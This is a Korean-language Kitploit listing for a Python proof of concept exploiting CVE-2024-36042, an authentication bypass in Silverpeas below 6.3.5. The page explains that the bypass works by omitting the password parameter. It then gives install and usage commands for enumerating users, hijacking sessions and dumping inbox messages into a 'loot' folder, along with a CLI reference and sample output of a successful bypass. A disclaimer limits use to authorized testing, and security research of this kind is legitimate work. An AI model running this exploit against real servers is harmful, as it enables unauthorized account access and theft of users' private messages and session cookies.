Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Silverpeas-AuthBypass-CVE-2024-36042 — Silverpeas < 6.3.5에서 CVE-2024-36042 인증 우회를 위한 Python PoC. 버전 감지, 멀티스레드 사용자 열거, 메시지 추출 및 승인된 보안 테스트를 위한 구조화된 보고 기능을 제공합니다. | Kitploit
도구/GitHubGitHub/ha5ant/silverpeas-authbypass-cve-2024-36042
Authentication & AuthorizationReconnaissanceVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingRed Teaming

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHub
ha5ant/silverpeas-authbypass-cve-2024-36042

Silverpeas-AuthBypass-CVE-2024-36042

Silverpeas < 6.3.5에서 CVE-2024-36042 인증 우회를 위한 Python PoC. 버전 감지, 멀티스레드 사용자 열거, 메시지 추출 및 승인된 보안 테스트를 위한 구조화된 보고 기능을 제공합니다.

저장소 보기
3개월 전아직 검토되지 않음

Silverpeas-AuthBypass-CVE-2024-36042

CVE-2024-36042에 대한 깔끔하고 전문적인 Python3 개념 증명 — Silverpeas < 6.3.5에서 AuthenticationServlet의 비밀번호 검증 누락으로 인한 인증 우회.

Python 3.8+ License: MIT


개요

Silverpeas AuthenticationServlet은 POST 본문에서 Password 매개변수가 생략되어도 로그인 요청을 수락하여 알려진 사용자 이름에 대해 인증된 세션 접근을 부여합니다. 이 도구는 모듈식 스레드 기반 익스플로잇 프레임워크를 통해 취약점을 책임감 있게 시연하며, 고급 정찰, 데이터 추출 및 전문 보고서 생성을 제공합니다.

영향: Silverpeas < 6.3.5 CVE: CVE-2024-36042 GHSA: GHSA-qvh3-8c57-gp4m


기능


설치

root@kitploit:~
git clone https://github.com/YOURNAME/Silverpeas-AuthBypass-CVE-2024-36042.git
cd Silverpeas-AuthBypass-CVE-2024-36042
pip install requests beautifulsoup4

사용법

빠른 테스트 (내장 사용자 목록)

root@kitploit:~
python3 CVE-2024-36042.py -t http://TARGET:8080 --dump-messages

고급 보고 (마크다운 + 콘솔)

root@kitploit:~
python3 CVE-2024-36042.py -t http://TARGET:8080 -u admin --dump-messages --message-output both

포렌식 내보내기 (메시지별 개별 파일)

root@kitploit:~
python3 CVE-2024-36042.py -t http://TARGET:8080 --userlist users.txt --dump-messages --message-output files --output-format md --outdir ./loot

버전 확인만 (익스플로잇 없음)

root@kitploit:~
python3 CVE-2024-36042.py -t http://TARGET:8080 --check-version --no-exploit

프록시를 통한 원시 HTML 로깅

root@kitploit:~
python3 CVE-2024-36042.py -t http://TARGET:8080 --proxy http://127.0.0.1:8080 --dump-messages --save-raw-html

출력 관리

이 도구는 --message-output를 통해 덤프된 메시지에 대해 네 가지 기본 출력 모드를 지원합니다:

  1. console (기본값): 키워드 강조와 함께 정리된 메시지를 터미널에 직접 출력합니다.
  2. markdown: 출력 디렉터리에 계정당 하나의 {username}_messages.md 보고서를 생성합니다.
  3. files: 계정별 폴더를 만들고 각 메시지를 개별 파일(예: message_0006.md)로 저장하며, 파일 시스템 정렬을 위해 0으로 채워진 ID를 사용합니다.
  4. both: console과 markdown 모드를 결합합니다.

아티팩트 구조

root@kitploit:~
outdir/
├── SilverAdmin/
│   ├── message_0001.md
│   ├── message_0002.md
│   ├── raw/ (선택 사항: --save-raw-html)
│   │   └── msg_1.html
│   └── session_cookies.txt
├── scr1ptkiddy/
│   ├── messages.md
│   └── session_cookies.txt
└── summary.json

CLI 참조

root@kitploit:~
-t, --target        Silverpeas의 기본 URL (필수)
-u, --user          단일 사용자 이름 타겟팅
--userlist          한 줄에 하나의 사용자 이름이 있는 파일
--dump-messages     받은 편지함 메시지 스크래핑 및 표시
--max-id            확인할 최대 메시지 ID (기본값: 50)
--threads           동시 작업자 수 (기본값: 5)
--proxy             HTTP 프록시 URL
--message-output    출력 모드: {console, markdown, files, both}
--output-format     파일 형식: {md, txt}
--json              전체 JSON 보고서 내보내기
--csv               스크래핑된 메시지 CSV 내보내기
--outdir            내보내기 출력 디렉터리
--no-color          ANSI 색상 출력 비활성화 (로그에 유용)
--save-raw-html     디버깅을 위해 원시 HTML 응답 저장
--check-version     버전만 식별
--no-exploit        익스플로잇 건너뛰기 (--check-version과 함께 사용)
--quiet, -q         최소 출력
--no-banner         배너 표시 안 함

출력 예시

root@kitploit:~
[*] 대상   : http://10.49.169.44:8080
[*] 버전   : 6.3.1
[+] 버전 6.3.1 < 6.3.5 - 취약함.

[*] 시도 중: scr1ptkiddy
[+] 우회 성공 -> scr1ptkiddy
[+] 데이터 저장됨: ./scr1ptkiddy

────────────────────────────────────────────────────────────────────
  실행 요약
────────────────────────────────────────────────────────────────────
┌───────────────┬──────────┬──────────┐
│ 계정          │ 상태     │ 메시지   │
├───────────────┼──────────┼──────────┤
│ scr1ptkiddy   │ 성공     │ 6        │
│ admin         │ 실패     │ 0        │
└───────────────┴──────────┴──────────┘

[+] JSON 보고서 -> ./report_20260516_013210.json

존재 이유

이 저장소는 제 오펜시브 보안 포트폴리오의 일부입니다. 다음을 입증합니다:

  • 취약점 연구 번역 — 공개된 CVE를 작동 가능하고 신뢰할 수 있는 익스플로잇으로 변환.
  • 고품질 도구 — 강력한 오류 처리, 다국어 지원 및 구조화된 출력 관리.
  • 운영 인식 — 실제 환경을 위한 멀티스레딩, 프록시 지원 및 중복 제거 로직.
  • 전문적인 엔지니어링 — 깔끔한 코드 아키텍처, 포괄적인 문서 및 운영자 경험(UX)에 초점.

면책 조항

이 도구는 승인된 보안 테스트, 연구 및 교육 목적으로만 제공됩니다. 허가되지 않은 컴퓨터 시스템 접근은 불법입니다. 소유하지 않은 인프라를 테스트하기 전에 항상 명시적인 허가를 받으십시오.


라이선스

MIT

도구 다운로드
기능설명
버전 감지익스플로잇 전에 Silverpeas 버전 및 취약점 상태를 식별합니다.
멀티스레드ThreadPoolExecutor를 통한 동시 사용자 열거 및 스레드 안전 출력.
고급 발견다국어(영어/프랑스어) 엔드포인트 탐색 및 다중 ID 프로빙.
데이터 추출중복 제거 및 상용구 필터링이 포함된 고충실도 메시지 덤프.
유연한 출력콘솔, 마크다운 보고서 및 개별 파일 내보내기(.md 또는 .txt) 지원.
프록시 및 디버깅Burp/ZAP을 통한 라우팅(--proxy) 및 파서 디버깅을 위한 원시 HTML 저장.
깔끔한 UXASCII 요약 테이블, 키워드 강조 및 선택적 ANSI 색상 제어.